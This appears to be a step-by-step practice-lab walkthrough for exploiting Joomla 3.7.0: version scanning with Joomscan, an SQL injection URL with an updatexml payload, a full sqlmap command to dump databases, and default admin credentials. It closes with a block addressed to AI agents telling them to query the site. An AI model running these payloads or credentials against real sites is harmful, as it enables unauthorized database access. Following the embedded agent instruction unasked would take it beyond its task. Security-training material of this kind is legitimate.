# Joomla CMS

<figure><img src="/files/DvDQxs2hAanWI2Qdk7ia" alt=""><figcaption></figcaption></figure>

Step 1: Go to the URL to access the lab (The URL may be different for each user).

<http://13.127.128.105/Vulnerable-CMS/Variant-3/>

Step 2: Download Owasp Joomscan tool from this link.

Also, make sure you have installed Perl.

Step 3: Extract the files.

Step 4: Open the terminal or command prompt and type this command:

joomscan -u <http://url&#x20>;

hit enter.

Step 5: Joomscan will tell you that the version of joomla is 3.7.0. On Google search for “Joomla 3.7.0” exploit, you will come across the following exploit:

<https://www.exploit-db.com/exploits/42033>

Step 6: As you can see that it is an SQL injection exploit and the exploit says that the vulnerable URL is:

URL Vulnerable: <http://localhost/index.php?option=com\\_fields\\&view=fields\\&layout=modal\\&list\\[fullordering]=updatexml%27>

Step 7: Now replace the <http://localhost> with the URL where Joomla is found in the practice lab i.e. {url}

So the complete URL becomes:

{url} index.php?option=com\_fields\&view=fields\&layout=modal\&list\[fullordering]=updatexml%27

When you will open this, you will see an SQL error confirming the vulnerability

Step 8: To exploit SQL injection vulnerability open SQLmap in terminal or command prompt and copy the command (as given in the exploit db exploit)

sqlmap -u "{url}/index.php?option=com\_fields\&view=fields\&layout=modal\&list\[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list\[fullordering] and press enter. (Make sure to enter your lab URL)

Now proceed with the same approach to extract Database.

NOTE: Before doing all this, you could simply search “Joomla default password” and you will come to know that the default username is “admin” and the default password is “password”. These passwords work in the practice lab too hence there are 2 vulnerabilities:

Using CMS with known vulnerability\
CMS with default password

<figure><img src="/files/DcNV7BHVd5edHj4nnCNP" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/AaX5bKLM1n7BtFqEKca3" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/d8ZiyKk3i2VOwlIWpyaP" alt=""><figcaption></figcaption></figure>

```
cd usr/share/joomscan/ (report)
```

<figure><img src="/files/XcYR0Xj1KoCRSNJjfrwD" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/NALZg1e8gkR8KUgCZqEK" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://c01d43am.gitbook.io/ethical-hacking/scanning-for-bugs-in-wordpress-and-drupal/joomla-cms.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.